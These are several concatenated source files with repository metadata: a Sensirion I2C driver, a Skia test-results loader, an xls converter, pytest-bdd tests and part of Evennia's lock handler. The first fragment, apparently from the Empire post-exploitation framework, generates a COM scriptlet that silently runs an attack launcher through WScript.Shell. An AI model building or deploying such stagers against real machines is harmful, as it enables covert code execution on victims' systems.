'Description': 'Proxy to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'ProxyCreds': {
'Description': 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# extract all of our options
listenerName = self.options['Listener']['Value']
base64 = self.options['Base64']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
stagerRetries = self.options['StagerRetries']['Value']
encode = False
if base64.lower() == "true":
encode = True
# generate the launcher code
launcher = self.mainMenu.stagers.generate_launcher(
listenerName, encode=encode, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
if launcher == "":
print helpers.color("[!] Error in launcher command generation.")
return ""
else:
code = "<?XML version=\"1.0\"?>\n"
code += "<scriptlet>\n"
code += "<registration\n"
code += "description=\"Win32COMDebug\"\n"
code += "progid=\"Win32COMDebug\"\n"
code += "version=\"1.00\"\n"
code += "classid=\"{AAAA1111-0000-0000-0000-0000FEEDACDC}\"\n"
code += " >\n"
code += " <script language=\"JScript\">\n"
code += " <![CDATA[\n"
code += " var r = new ActiveXObject(\"WScript.Shell\").Run(\"" + launcher + "\",0);\n"
code += " ]]>\n"
code += " </script>\n"
code += "</registration>\n"
code += "<public>\n"
code += " <method name=\"Exec\"></method>\n"
code += "</public>\n"
code += "</scriptlet>\n"
return code
|
pierce403/EmpirePanel
|
lib/stagers/launcher_sct.py
|
Python
|
bsd-3-clause
| 4,194
|
#
# ------------------------------------------------------------
# Copyright (c) All rights reserved
# SiLab, Institute of Physics, University of Bonn
# ------------------------------------------------------------
#
import logging
from basil.TL.TransferLayer import TransferLayer
from sensirion_shdlc_driver import ShdlcSerialPort, ShdlcConnection
from sensirion_shdlc_sensorbridge import SensorBridgePort, SensorBridgeShdlcDevice
from sensirion_shdlc_sensorbridge.device_errors import SensorBridgeI2cTimeoutError
TimeoutError = SensorBridgeI2cTimeoutError
# Requires 'sensirion_shdlc_sensorbridge'
logger = logging.getLogger(__name__)
class SensirionSensorBridge(TransferLayer):
'''
Driver for Sensirion Sensor Bridge using the official SHDLC drivers of Sensirion.
The Sensirion Sensor Bridge is connected via USB and allows communication to two I2C ports.
'''
bridge_ports = {
"one": SensorBridgePort.ONE,
"two": SensorBridgePort.TWO,
"all": SensorBridgePort.ALL,
}
def __init__(self, conf):
super(SensirionSensorBridge, self).__init__(conf)
def init(self):
super(SensirionSensorBridge, self).init()
self.port = self._init['port']
self.baudrate = self._init.get('baudrate', 460800)
self.ser = ShdlcSerialPort(port=self.port, baudrate=self.baudrate)
def setup_i2c_device(self, bridge_port=SensorBridgePort.ONE, voltage=3.3, frequency=400e3, **_):
device = SensorBridgeShdlcDevice(ShdlcConnection(self.ser), slave_address=0)
device.set_i2c_frequency(bridge_port, frequency=frequency)
device.set_supply_voltage(bridge_port, voltage=voltage)
device.switch_supply_on(bridge_port)
return device
    def disable_i2c_device(self, device, bridge_port=SensorBridgePort.ONE):
        if device is not None:
            device.switch_supply_off(bridge_port)
def print_i2c_device_information(self, device):
logger.info("Product Name: {}".format(device.get_product_name()))
logger.info("Product Type: {}".format(device.get_product_type()))
logger.info("Serial Number: {}".format(device.get_serial_number()))
logger.info("Version: {}".format(device.get_version()))
def read_i2c(self, device, port, address, command, read_n_bytes=0, timeout_us=100e3):
rx_data = device.transceive_i2c(port, address=address, tx_data=command,
rx_length=read_n_bytes, timeout_us=timeout_us)
return rx_data
def write_i2c(self, device, port, address, command):
device.transceive_i2c(port, address=address,
rx_length=0, tx_data=command, timeout_us=0)
def __del__(self):
self.close()
def close(self):
super(SensirionSensorBridge, self).close()
if hasattr(self, 'ser'):
self.ser.close()
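# Hypothetical usage sketch (not part of the driver): the conf structure,
# serial port name, I2C address and command bytes below are placeholders
# for illustration only.
#
#   tl = SensirionSensorBridge(dict(init=dict(port='/dev/ttyUSB0')))
#   tl.init()
#   dev = tl.setup_i2c_device(bridge_port=SensorBridgePort.ONE, voltage=3.3)
#   tl.print_i2c_device_information(dev)
#   data = tl.read_i2c(dev, SensorBridgePort.ONE, address=0x44,
#                      command=b'\x24\x00', read_n_bytes=6)
#   tl.disable_i2c_device(dev)
#   tl.close()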
|
SiLab-Bonn/basil
|
basil/TL/SensirionSensorBridge.py
|
Python
|
bsd-3-clause
| 2,893
|
#!/usr/bin/python
"""
Copyright 2013 Google Inc.
Use of this source code is governed by a BSD-style license that can be
found in the LICENSE file.
Repackage expected/actual GM results as needed by our HTML rebaseline viewer.
"""
# System-level imports
import argparse
import fnmatch
import json
import logging
import os
import re
import sys
import time
# Imports from within Skia
#
# We need to add the 'gm' directory, so that we can import gm_json.py within
# that directory. That script allows us to parse the actual-results.json file
# written out by the GM tool.
# Make sure that the 'gm' dir is in the PYTHONPATH, but add it at the *end*
# so any dirs that are already in the PYTHONPATH will be preferred.
PARENT_DIRECTORY = os.path.dirname(os.path.realpath(__file__))
GM_DIRECTORY = os.path.dirname(PARENT_DIRECTORY)
if GM_DIRECTORY not in sys.path:
sys.path.append(GM_DIRECTORY)
import gm_json
import imagediffdb
IMAGE_FILENAME_RE = re.compile(gm_json.IMAGE_FILENAME_PATTERN)
IMAGE_FILENAME_FORMATTER = '%s_%s.png' # pass in (testname, config)
FIELDS_PASSED_THRU_VERBATIM = [
gm_json.JSONKEY_EXPECTEDRESULTS_BUGS,
gm_json.JSONKEY_EXPECTEDRESULTS_IGNOREFAILURE,
gm_json.JSONKEY_EXPECTEDRESULTS_REVIEWED,
]
CATEGORIES_TO_SUMMARIZE = [
'builder', 'test', 'config', 'resultType',
gm_json.JSONKEY_EXPECTEDRESULTS_IGNOREFAILURE,
gm_json.JSONKEY_EXPECTEDRESULTS_REVIEWED,
]
RESULTS_ALL = 'all'
RESULTS_FAILURES = 'failures'
class Results(object):
""" Loads actual and expected results from all builders, supplying combined
reports as requested.
Once this object has been constructed, the results (in self._results[])
are immutable. If you want to update the results based on updated JSON
file contents, you will need to create a new Results object."""
def __init__(self, actuals_root, expected_root, generated_images_root):
"""
Args:
actuals_root: root directory containing all actual-results.json files
expected_root: root directory containing all expected-results.json files
generated_images_root: directory within which to create all pixel diffs;
if this directory does not yet exist, it will be created
"""
time_start = int(time.time())
self._image_diff_db = imagediffdb.ImageDiffDB(generated_images_root)
self._actuals_root = actuals_root
self._expected_root = expected_root
self._load_actual_and_expected()
self._timestamp = int(time.time())
logging.info('Results complete; took %d seconds.' %
(self._timestamp - time_start))
def get_timestamp(self):
"""Return the time at which this object was created, in seconds past epoch
(UTC).
"""
return self._timestamp
def edit_expectations(self, modifications):
"""Edit the expectations stored within this object and write them back
to disk.
Note that this will NOT update the results stored in self._results[] ;
in order to see those updates, you must instantiate a new Results object
based on the (now updated) files on disk.
Args:
modifications: a list of dictionaries, one for each expectation to update:
[
{
'builder': 'Test-Mac10.6-MacMini4.1-GeForce320M-x86-Debug',
'test': 'bigmatrix',
'config': '8888',
'expectedHashType': 'bitmap-64bitMD5',
'expectedHashDigest': '10894408024079689926',
'bugs': [123, 456],
'ignore-failure': false,
'reviewed-by-human': true,
},
...
]
"""
expected_builder_dicts = Results._read_dicts_from_root(self._expected_root)
for mod in modifications:
image_name = IMAGE_FILENAME_FORMATTER % (mod['test'], mod['config'])
# TODO(epoger): assumes a single allowed digest per test
allowed_digests = [[mod['expectedHashType'],
int(mod['expectedHashDigest'])]]
new_expectations = {
gm_json.JSONKEY_EXPECTEDRESULTS_ALLOWEDDIGESTS: allowed_digests,
}
for field in FIELDS_PASSED_THRU_VERBATIM:
value = mod.get(field)
if value is not None:
new_expectations[field] = value
builder_dict = expected_builder_dicts[mod['builder']]
builder_expectations = builder_dict.get(gm_json.JSONKEY_EXPECTEDRESULTS)
if not builder_expectations:
builder_expectations = {}
builder_dict[gm_json.JSONKEY_EXPECTEDRESULTS] = builder_expectations
builder_expectations[image_name] = new_expectations
Results._write_dicts_to_root(expected_builder_dicts, self._expected_root)
def get_results_of_type(self, type):
"""Return results of some/all tests (depending on 'type' parameter).
Args:
type: string describing which types of results to include; must be one
of the RESULTS_* constants
Results are returned as a dictionary in this form:
{
'categories': # dictionary of categories listed in
# CATEGORIES_TO_SUMMARIZE, with the number of times
# each value appears within its category
{
'resultType': # category name
{
'failed': 29, # category value and total number found of that value
'failure-ignored': 948,
'no-comparison': 4502,
'succeeded': 38609,
},
'builder':
{
'Test-Mac10.6-MacMini4.1-GeForce320M-x86-Debug': 1286,
'Test-Mac10.6-MacMini4.1-GeForce320M-x86-Release': 1134,
...
},
... # other categories from CATEGORIES_TO_SUMMARIZE
}, # end of 'categories' dictionary
'testData': # list of test results, with a dictionary for each
[
{
'resultType': 'failed',
'builder': 'Test-Mac10.6-MacMini4.1-GeForce320M-x86-Debug',
'test': 'bigmatrix',
'config': '8888',
'expectedHashType': 'bitmap-64bitMD5',
'expectedHashDigest': '10894408024079689926',
'actualHashType': 'bitmap-64bitMD5',
'actualHashDigest': '2409857384569',
'bugs': [123, 456],
'ignore-failure': false,
'reviewed-by-human': true,
},
...
], # end of 'testData' list
}
"""
return self._results[type]
@staticmethod
def _read_dicts_from_root(root, pattern='*.json'):
"""Read all JSON dictionaries within a directory tree.
Args:
root: path to root of directory tree
pattern: which files to read within root (fnmatch-style pattern)
Returns:
A meta-dictionary containing all the JSON dictionaries found within
the directory tree, keyed by the builder name of each dictionary.
Raises:
IOError if root does not refer to an existing directory
"""
if not os.path.isdir(root):
raise IOError('no directory found at path %s' % root)
meta_dict = {}
for dirpath, dirnames, filenames in os.walk(root):
for matching_filename in fnmatch.filter(filenames, pattern):
builder = os.path.basename(dirpath)
# If we are reading from the collection of actual results, skip over
# the Trybot results (we don't maintain baselines for them).
if builder.endswith('-Trybot'):
continue
fullpath = os.path.join(dirpath, matching_filename)
meta_dict[builder] = gm_json.LoadFromFile(fullpath)
return meta_dict
@staticmethod
def _write_dicts_to_root(meta_dict, root, pattern='*.json'):
"""Write all per-builder dictionaries within meta_dict to files under
the root path.
Security note: this will only write to files that already exist within
the root path (as found by os.walk() within root), so we don't need to
worry about malformed content writing to disk outside of root.
However, the data written to those files is not double-checked, so it
could contain poisonous data.
Args:
meta_dict: a builder-keyed meta-dictionary containing all the JSON
dictionaries we want to write out
root: path to root of directory tree within which to write files
pattern: which files to write within root (fnmatch-style pattern)
Raises:
IOError if root does not refer to an existing directory
KeyError if the set of per-builder dictionaries written out was
different than expected
"""
if not os.path.isdir(root):
raise IOError('no directory found at path %s' % root)
actual_builders_written = []
for dirpath, dirnames, filenames in os.walk(root):
for matching_filename in fnmatch.filter(filenames, pattern):
builder = os.path.basename(dirpath)
# We should never encounter Trybot *expectations*, but if we are
# writing into the actual-results dir, skip the Trybot actuals.
# (I don't know why we would ever write into the actual-results dir,
# though.)
if builder.endswith('-Trybot'):
continue
per_builder_dict = meta_dict.get(builder)
if per_builder_dict is not None:
fullpath = os.path.join(dirpath, matching_filename)
gm_json.WriteToFile(per_builder_dict, fullpath)
actual_builders_written.append(builder)
# Check: did we write out the set of per-builder dictionaries we
# expected to?
expected_builders_written = sorted(meta_dict.keys())
actual_builders_written.sort()
if expected_builders_written != actual_builders_written:
raise KeyError(
'expected to write dicts for builders %s, but actually wrote them '
'for builders %s' % (
expected_builders_written, actual_builders_written))
def _generate_pixel_diffs_if_needed(self, test, expected_image, actual_image):
"""If expected_image and actual_image both exist but are different,
add the image pair to self._image_diff_db and generate pixel diffs.
Args:
test: string; name of test
expected_image: (hashType, hashDigest) tuple describing the expected image
actual_image: (hashType, hashDigest) tuple describing the actual image
"""
if expected_image == actual_image:
return
(expected_hashtype, expected_hashdigest) = expected_image
(actual_hashtype, actual_hashdigest) = actual_image
if None in [expected_hashtype, expected_hashdigest,
actual_hashtype, actual_hashdigest]:
return
expected_url = gm_json.CreateGmActualUrl(
test_name=test, hash_type=expected_hashtype,
hash_digest=expected_hashdigest)
actual_url = gm_json.CreateGmActualUrl(
test_name=test, hash_type=actual_hashtype,
hash_digest=actual_hashdigest)
self._image_diff_db.add_image_pair(
expected_image_locator=expected_hashdigest,
expected_image_url=expected_url,
actual_image_locator=actual_hashdigest,
actual_image_url=actual_url)
def _load_actual_and_expected(self):
"""Loads the results of all tests, across all builders (based on the
files within self._actuals_root and self._expected_root),
and stores them in self._results.
"""
logging.info('Reading actual-results JSON files from %s...' %
self._actuals_root)
actual_builder_dicts = Results._read_dicts_from_root(self._actuals_root)
logging.info('Reading expected-results JSON files from %s...' %
self._expected_root)
expected_builder_dicts = Results._read_dicts_from_root(self._expected_root)
categories_all = {}
categories_failures = {}
Results._ensure_included_in_category_dict(categories_all,
'resultType', [
gm_json.JSONKEY_ACTUALRESULTS_FAILED,
gm_json.JSONKEY_ACTUALRESULTS_FAILUREIGNORED,
gm_json.JSONKEY_ACTUALRESULTS_NOCOMPARISON,
gm_json.JSONKEY_ACTUALRESULTS_SUCCEEDED,
])
Results._ensure_included_in_category_dict(categories_failures,
'resultType', [
gm_json.JSONKEY_ACTUALRESULTS_FAILED,
gm_json.JSONKEY_ACTUALRESULTS_FAILUREIGNORED,
gm_json.JSONKEY_ACTUALRESULTS_NOCOMPARISON,
])
data_all = []
data_failures = []
builders = sorted(actual_builder_dicts.keys())
num_builders = len(builders)
builder_num = 0
for builder in builders:
builder_num += 1
logging.info('Generating pixel diffs for builder #%d of %d, "%s"...' %
(builder_num, num_builders, builder))
actual_results_for_this_builder = (
actual_builder_dicts[builder][gm_json.JSONKEY_ACTUALRESULTS])
for result_type in sorted(actual_results_for_this_builder.keys()):
results_of_this_type = actual_results_for_this_builder[result_type]
if not results_of_this_type:
continue
for image_name in sorted(results_of_this_type.keys()):
actual_image = results_of_this_type[image_name]
# Default empty expectations; overwrite these if we find any real ones
expectations_per_test = None
expected_image = [None, None]
try:
expectations_per_test = (
expected_builder_dicts
[builder][gm_json.JSONKEY_EXPECTEDRESULTS][image_name])
# TODO(epoger): assumes a single allowed digest per test
expected_image = (
expectations_per_test
[gm_json.JSONKEY_EXPECTEDRESULTS_ALLOWEDDIGESTS][0])
except (KeyError, TypeError):
# There are several cases in which we would expect to find
# no expectations for a given test:
#
# 1. result_type == NOCOMPARISON
# There are no expectations for this test yet!
#
# 2. alternate rendering mode failures (e.g. serialized)
# In cases like
# https://code.google.com/p/skia/issues/detail?id=1684
# ('tileimagefilter GM test failing in serialized render mode'),
# the gm-actuals will list a failure for the alternate
# rendering mode even though we don't have explicit expectations
# for the test (the implicit expectation is that it must
# render the same in all rendering modes).
#
# Don't log type 1, because it is common.
# Log other types, because they are rare and we should know about
# them, but don't throw an exception, because we need to keep our
# tools working in the meanwhile!
if result_type != gm_json.JSONKEY_ACTUALRESULTS_NOCOMPARISON:
logging.warning('No expectations found for test: %s' % {
'builder': builder,
'image_name': image_name,
'result_type': result_type,
})
# If this test was recently rebaselined, it will remain in
# the 'failed' set of actuals until all the bots have
# cycled (although the expectations have indeed been set
# from the most recent actuals). Treat these as successes
# instead of failures.
#
# TODO(epoger): Do we need to do something similar in
# other cases, such as when we have recently marked a test
# as ignoreFailure but it still shows up in the 'failed'
# category? Maybe we should not rely on the result_type
# categories recorded within the gm_actuals AT ALL, and
# instead evaluate the result_type ourselves based on what
# we see in expectations vs actual checksum?
if expected_image == actual_image:
updated_result_type = gm_json.JSONKEY_ACTUALRESULTS_SUCCEEDED
else:
updated_result_type = result_type
(test, config) = IMAGE_FILENAME_RE.match(image_name).groups()
self._generate_pixel_diffs_if_needed(
test=test, expected_image=expected_image,
actual_image=actual_image)
results_for_this_test = {
'resultType': updated_result_type,
'builder': builder,
'test': test,
'config': config,
'actualHashType': actual_image[0],
'actualHashDigest': str(actual_image[1]),
'expectedHashType': expected_image[0],
'expectedHashDigest': str(expected_image[1]),
# FIELDS_PASSED_THRU_VERBATIM that may be overwritten below...
gm_json.JSONKEY_EXPECTEDRESULTS_IGNOREFAILURE: False,
}
if expectations_per_test:
for field in FIELDS_PASSED_THRU_VERBATIM:
results_for_this_test[field] = expectations_per_test.get(field)
if updated_result_type == gm_json.JSONKEY_ACTUALRESULTS_NOCOMPARISON:
pass # no diff record to calculate at all
elif updated_result_type == gm_json.JSONKEY_ACTUALRESULTS_SUCCEEDED:
results_for_this_test['numDifferingPixels'] = 0
results_for_this_test['percentDifferingPixels'] = 0
results_for_this_test['weightedDiffMeasure'] = 0
results_for_this_test['maxDiffPerChannel'] = 0
else:
try:
diff_record = self._image_diff_db.get_diff_record(
expected_image_locator=expected_image[1],
actual_image_locator=actual_image[1])
results_for_this_test['numDifferingPixels'] = (
diff_record.get_num_pixels_differing())
results_for_this_test['percentDifferingPixels'] = (
diff_record.get_percent_pixels_differing())
results_for_this_test['weightedDiffMeasure'] = (
diff_record.get_weighted_diff_measure())
results_for_this_test['maxDiffPerChannel'] = (
diff_record.get_max_diff_per_channel())
except KeyError:
logging.warning('unable to find diff_record for ("%s", "%s")' %
(expected_image[1], actual_image[1]))
pass
Results._add_to_category_dict(categories_all, results_for_this_test)
data_all.append(results_for_this_test)
# TODO(epoger): In effect, we have a list of resultTypes that we
# include in the different result lists (data_all and data_failures).
# This same list should be used by the calls to
# Results._ensure_included_in_category_dict() earlier on.
if updated_result_type != gm_json.JSONKEY_ACTUALRESULTS_SUCCEEDED:
Results._add_to_category_dict(categories_failures,
results_for_this_test)
data_failures.append(results_for_this_test)
self._results = {
RESULTS_ALL:
{'categories': categories_all, 'testData': data_all},
RESULTS_FAILURES:
{'categories': categories_failures, 'testData': data_failures},
}
@staticmethod
def _add_to_category_dict(category_dict, test_results):
"""Add test_results to the category dictionary we are building.
(See documentation of self.get_results_of_type() for the format of this
dictionary.)
Args:
category_dict: category dict-of-dicts to add to; modify this in-place
test_results: test data with which to update category_list, in a dict:
{
'category_name': 'category_value',
'category_name': 'category_value',
...
}
"""
for category in CATEGORIES_TO_SUMMARIZE:
category_value = test_results.get(category)
if not category_dict.get(category):
category_dict[category] = {}
if not category_dict[category].get(category_value):
category_dict[category][category_value] = 0
category_dict[category][category_value] += 1
@staticmethod
def _ensure_included_in_category_dict(category_dict,
category_name, category_values):
"""Ensure that the category name/value pairs are included in category_dict,
even if there aren't any results with that name/value pair.
(See documentation of self.get_results_of_type() for the format of this
dictionary.)
Args:
category_dict: category dict-of-dicts to modify
category_name: category name, as a string
category_values: list of values we want to make sure are represented
for this category
"""
if not category_dict.get(category_name):
category_dict[category_name] = {}
for category_value in category_values:
if not category_dict[category_name].get(category_value):
category_dict[category_name][category_value] = 0
def main():
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',
datefmt='%m/%d/%Y %H:%M:%S',
level=logging.INFO)
parser = argparse.ArgumentParser()
parser.add_argument(
'--actuals', required=True,
help='Directory containing all actual-result JSON files')
parser.add_argument(
'--expectations', required=True,
help='Directory containing all expected-result JSON files')
parser.add_argument(
'--outfile', required=True,
help='File to write result summary into, in JSON format')
parser.add_argument(
'--workdir', default='.workdir',
help='Directory within which to download images and generate diffs')
args = parser.parse_args()
results = Results(actuals_root=args.actuals,
expected_root=args.expectations,
generated_images_root=args.workdir)
gm_json.WriteToFile(results.get_results_of_type(RESULTS_ALL), args.outfile)
if __name__ == '__main__':
main()
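# Example invocation (flag names as defined in main() above; the paths are
# placeholders):
#
#   python results.py --actuals /path/to/actual-results \
#       --expectations /path/to/expected-results \
#       --outfile /tmp/results-summary.json --workdir /tmp/.workdir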
|
zhongzw/skia-sdl
|
gm/rebaseline_server/results.py
|
Python
|
bsd-3-clause
| 21,859
|
import csv
import xlrd
def xlstocsv(infile, outfile, ws=0):
    """Dump worksheet `ws` of an Excel workbook to a tab-delimited file."""
    book = xlrd.open_workbook(infile)
    sheet = book.sheet_by_index(ws)
    with open(outfile, 'w') as f:
        outcsv = csv.writer(f, delimiter='\t')
        for ry in range(sheet.nrows):
            outcsv.writerow([sheet.cell_value(rowx=ry, colx=rx)
                             for rx in range(sheet.ncols)])
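# Hypothetical usage (filenames are placeholders): convert the first
# worksheet of a workbook to tab-separated text.
if __name__ == '__main__':
    xlstocsv('input.xls', 'output.tsv', ws=0)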
|
mubdi/MubdiScripts
|
mubdiscripts/xlstocsv.py
|
Python
|
bsd-3-clause
| 440
|
import pytest
from pytest_bdd import scenarios, given, when, then
from scenarios_run import *
scenarios('../feature/config', example_converters=dict(command = str, environment = Environment, pattern = PatternType))
@given('the <environment> is configured for <command> command in the configuration')
def add_environment_to_command(config, command, environment):
config.commands[command].set_environment(environment)
@given('the <pattern> is configured for <command> command in the configuration')
def add_pattern_to_command(config, command, pattern):
config.commands[command].add_pattern(pattern)
@then('the runtime environment for <command> should contain the given <environment>')
def check_environment(run_environment, command, environment):
    runs = run_environment.config.commands[command].runs
    assert(len(runs) > 0)
    actual_env = runs[-1].environment
for key,value in environment.items():
for permutation in run_environment.config.commands[command].pattern_generator():
replaced_key = key
replaced_value = value
for pattern_key, pattern_value in permutation.items():
replaced_key = replaced_key.replace('{' + pattern_key + '}', pattern_value)
replaced_value = replaced_value.replace('{' + pattern_key + '}', pattern_value)
assert(replaced_key in actual_env)
assert(replaced_value == actual_env[replaced_key])
|
bverhagen/exec-helper
|
test/integration/src/test_config.py
|
Python
|
bsd-3-clause
| 1,444
|
"""
A *lock* defines access to a particular subsystem or property of
Evennia. For example, the "owner" property can be implemented as a
lock, as can the ability to lift an object or to ban users.
A lock consists of three parts:
- access_type - this defines what kind of access this lock regulates. This
  is just a string.
- function call - this is one or many calls to functions that will determine
if the lock is passed or not.
- lock function(s). These are regular python functions with a special
set of allowed arguments. They should always return a boolean depending
on if they allow access or not.
A lock function is defined by existing in one of the modules
listed by settings.LOCK_FUNC_MODULES. It should also always
take four arguments looking like this:
funcname(accessing_obj, accessed_obj, *args, **kwargs):
[...]
The accessing object is the object wanting to gain access.
The accessed object is the object this lock resides on
args and kwargs will hold optional arguments and/or keyword arguments
to the function as a list and a dictionary respectively.
Example:
    def perm(accessing_obj, accessed_obj, *args, **kwargs):
"Checking if the object has a particular, desired permission"
if args:
desired_perm = args[0]
return desired_perm in accessing_obj.permissions.all()
return False
Lock functions should most often be pretty general and ideally possible to
re-use and combine in various ways to build clever locks.
Lock definition ("Lock string")
A lock definition is a string with a special syntax. It is added to
each object's lockhandler, making that lock available from then on.
The lock definition looks like this:
'access_type:[NOT] func1(args)[ AND|OR][NOT] func2() ...'
That is, the access_type, a colon followed by calls to lock functions
combined with AND or OR. NOT negates the result of the following call.
Example:
We want to limit who may edit a particular object (let's call this access_type
for 'edit', it depends on what the command is looking for). We want this to
only work for those with the Permission 'Builder'. So we use our lock
function above and define it like this:
'edit:perm(Builder)'
Here, the lock-function perm() will be called with the string
'Builder' (accessing_obj and accessed_obj are added automatically,
you only need to add the args/kwargs, if any).
If we wanted to make sure the accessing object was BOTH a Builder and a
GoodGuy, we could use AND:
'edit:perm(Builder) AND perm(GoodGuy)'
To allow EITHER Builders OR GoodGuys, we replace AND with OR. perm() is just
one example; a lock function can do anything and compare any properties of
the calling object to decide if the lock is passed or not.
'lift:attrib(very_strong) AND NOT attrib(bad_back)'
To make these work, add the string to the lockhandler of the object you want
to apply the lock to:
obj.lockhandler.add('edit:perm(Builder)')
From then on, a command that wants to check for 'edit' access on this
object would do something like this:
if not target_obj.lockhandler.has_perm(caller, 'edit'):
caller.msg("Sorry, you cannot edit that.")
All objects also have a shortcut called 'access' that is recommended
instead:
if not target_obj.access(caller, 'edit'):
caller.msg("Sorry, you cannot edit that.")
Permissions
Permissions are just text strings stored in a comma-separated list on
typeclassed objects. The default perm() lock function uses them,
taking into account settings.PERMISSION_HIERARCHY. Also, the
restricted @perm command sets them, but otherwise they are identical
to any other identifier you can use.
"""
from __future__ import print_function
from builtins import object
import re
from django.conf import settings
from evennia.utils import logger, utils
from django.utils.translation import ugettext as _
__all__ = ("LockHandler", "LockException")
WARNING_LOG = settings.LOCKWARNING_LOG_FILE
#
# Exception class. This will be raised
# by errors in lock definitions.
#
class LockException(Exception):
"""
Raised during an error in a lock.
"""
pass
#
# Cached lock functions
#
_LOCKFUNCS = {}
def _cache_lockfuncs():
"""
Updates the cache.
"""
global _LOCKFUNCS
_LOCKFUNCS = {}
for modulepath in settings.LOCK_FUNC_MODULES:
_LOCKFUNCS.update(utils.callables_from_module(modulepath))
#
# pre-compiled regular expressions
#
_RE_FUNCS = re.compile(r"\w+\([^)]*\)")
_RE_SEPS = re.compile(r"(?<=[ )])AND(?=\s)|(?<=[ )])OR(?=\s)|(?<=[ )])NOT(?=\s)")
_RE_OK = re.compile(r"%s|and|or|not")
#
#
# Lock handler
#
#
class LockHandler(object):
"""
This handler should be attached to all objects implementing
permission checks, under the property 'lockhandler'.
"""
def __init__(self, obj):
"""
Loads and pre-caches all relevant locks and their functions.
Args:
obj (object): The object on which the lockhandler is
defined.
"""
if not _LOCKFUNCS:
_cache_lockfuncs()
self.obj = obj
self.locks = {}
try:
self.reset()
except LockException as err:
logger.log_trace(err)
def __str__(self):
return ";".join(self.locks[key][2] for key in sorted(self.locks))
def _log_error(self, message):
"Try to log errors back to object"
raise LockException(message)
def _parse_lockstring(self, storage_lockstring):
"""
Helper function. This is normally only called when the
lockstring is cached and does preliminary checking. locks are
stored as a string
atype:[NOT] lock()[[ AND|OR [NOT] lock()[...]];atype...
Args:
            storage_lockstring (str): The lockstring to parse.
"""
locks = {}
if not storage_lockstring:
return locks
duplicates = 0
elist = [] # errors
wlist = [] # warnings
for raw_lockstring in storage_lockstring.split(';'):
if not raw_lockstring:
continue
lock_funcs = []
try:
access_type, rhs = (part.strip() for part in raw_lockstring.split(':', 1))
except ValueError:
logger.log_trace()
return locks
# parse the lock functions and separators
funclist = _RE_FUNCS.findall(rhs)
evalstring = rhs
for pattern in ('AND', 'OR', 'NOT'):
evalstring = re.sub(r"\b%s\b" % pattern, pattern.lower(), evalstring)
nfuncs = len(funclist)
for funcstring in funclist:
funcname, rest = (part.strip().strip(')') for part in funcstring.split('(', 1))
func = _LOCKFUNCS.get(funcname, None)
if not callable(func):
elist.append(_("Lock: lock-function '%s' is not available.") % funcstring)
continue
args = list(arg.strip() for arg in rest.split(',') if arg and '=' not in arg)
kwargs = dict([arg.split('=', 1) for arg in rest.split(',') if arg and '=' in arg])
lock_funcs.append((func, args, kwargs))
evalstring = evalstring.replace(funcstring, '%s')
if len(lock_funcs) < nfuncs:
continue
try:
# purge the eval string of any superfluous items, then test it
evalstring = " ".join(_RE_OK.findall(evalstring))
eval(evalstring % tuple(True for func in funclist), {}, {})
except Exception:
elist.append(_("Lock: definition '%s' has syntax errors.") % raw_lockstring)
continue
if access_type in locks:
duplicates += 1
wlist.append(_("LockHandler on %(obj)s: access type '%(access_type)s' changed from '%(source)s' to '%(goal)s' " %
{"obj": self.obj, "access_type": access_type, "source": locks[access_type][2], "goal": raw_lockstring}))
locks[access_type] = (evalstring, tuple(lock_funcs), raw_lockstring)
if wlist and WARNING_LOG:
# a warning text was set, it's not an error, so only report
logger.log_file("\n".join(wlist), WARNING_LOG)
if elist:
# an error text was set, raise exception.
raise LockException("\n".join(elist))
# return the gathered locks in an easily executable form
return locks
def _cache_locks(self, storage_lockstring):
"""
Store data
"""
self.locks = self._parse_lockstring(storage_lockstring)
def _save_locks(self):
"""
Store locks to obj
"""
self.obj.lock_storage = ";".join([tup[2] for tup in self.locks.values()])
def cache_lock_bypass(self, obj):
"""
We cache superuser bypass checks here for efficiency. This
needs to be re-run when an account is assigned to a character.
        We need to grant access to superusers, checking both directly
        on the object (accounts), through obj.account, and using the
        get_account() method (the latter sits on serversessions, for
        the rare cases where a check is done before the login process
        has been fully finalized).
Args:
obj (object): This is checked for the `is_superuser` property.
"""
self.lock_bypass = hasattr(obj, "is_superuser") and obj.is_superuser
def add(self, lockstring):
"""
Add a new lockstring to handler.
Args:
lockstring (str or list): A string on the form
`"<access_type>:<functions>"`. Multiple access types
should be separated by semicolon (`;`). Alternatively,
a list with lockstrings.
Returns:
success (bool): The outcome of the addition, `False` on
error.
"""
if isinstance(lockstring, basestring):
lockdefs = lockstring.split(";")
else:
lockdefs = [lockdef for locks in lockstring for lockdef in locks.split(";")]
lockstring = ";".join(lockdefs)
# sanity checks
for lockdef in lockdefs:
if ':' not in lockdef:
self._log_error(_("Lock: '%s' contains no colon (:).") % lockdef)
return False
access_type, rhs = [part.strip() for part in lockdef.split(':', 1)]
if not access_type:
self._log_error(_("Lock: '%s' has no access_type (left-side of colon is empty).") % lockdef)
return False
if rhs.count('(') != rhs.count(')'):
self._log_error(_("Lock: '%s' has mismatched parentheses.") % lockdef)
return False
if not _RE_FUNCS.findall(rhs):
self._log_error(_("Lock: '%s' has no valid lock functions.") % lockdef)
return False
# get the lock string
storage_lockstring = self.obj.lock_storage
if storage_lockstring:
storage_lockstring = storage_lockstring + ";" + lockstring
else:
storage_lockstring = lockstring
# cache the locks will get rid of eventual doublets
self._cache_locks(storage_lockstring)
self._save_locks()
return True
def replace(self, lockstring):
"""
Replaces the lockstring entirely.
Args:
lockstring (str): The new lock definition.
Return:
success (bool): False if an error occurred.
Raises:
LockException: If a critical error occurred.
If so, the old string is recovered.
"""
old_lockstring = str(self)
self.clear()
try:
return self.add(lockstring)
except LockException:
self.add(old_lockstring)
raise
def get(self, access_type=None):
"""
Get the full lockstring or the lockstring of a particular
access type.
Args:
access_type (str, optional):
Returns:
lockstring (str): The matched lockstring, or the full
lockstring if no access_type was given.
"""
if access_type:
return self.locks.get(access_type, ["", "", ""])[2]
return str(self)
def all(self):
"""
Return all lockstrings
Returns:
lockstrings (list): All separate lockstrings
"""
